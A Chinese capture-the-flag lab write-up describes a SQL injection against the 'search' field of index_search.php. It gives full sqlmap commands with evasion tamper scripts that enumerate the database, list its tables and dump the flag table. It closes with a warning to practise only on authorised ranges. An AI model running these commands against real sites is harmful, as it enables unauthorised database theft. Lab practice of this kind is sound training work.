靶场环境:Windows10虚拟机
审题:通过“index_search.php”地址中的search进行SQL注入!

点开地址,发现是以下页面

滑动鼠标,可以看到下面有一个输入框。
该输入框存在sql注入漏洞,进行BurpSuite抓包

BP抓包后,复制请求包内容

将复制的请求包内容,粘贴到文本文档5.txt中(不做任何修改)

此处需要使用sqlmap工具(sqlmap安装教程,网上自行搜索)
使用sqlmap工具对 5.txt 文件,进行注入
python sqlmap.py -r 文本文档路径 –batch –level=5 –risk=3 –technique=T –random-agent –tamper=between,space2comment,versionedmorekeywords –dbms=mysql –force-ssl –time-sec=2 –current-db

成功获取到数据库名“electricks”

接下来,获取数据库表名
python sqlmap.py -r 文本文档路径 –batch –level=5 –risk=3 –technique=T –random-agent –tamper=between,space2comment,versionedmorekeywords –dbms=mysql –force-ssl –time-sec=2 -D electricks –tables

数据库表中可以看到有个flllaaaag表,读取这个表内容

读取flllaaaag表内容,获取flag
python sqlmap.py -r 文本文档路径 –batch –level=5 –risk=3 –technique=T –random-agent –tamper=between,space2comment,versionedmorekeywords –dbms=mysql –force-ssl –time-sec=2 -D electricks -T flllaaaag –dump

成功获取flag

📌温馨提示:
文中演示的漏洞攻击手段仅用于授权靶场练习,目的是学习漏洞防御知识。未获得授权的网站不允许任何渗透、扫描行为,触碰法律红线会承担民事、刑事责任,建议大家仅在合规靶场开展学习。






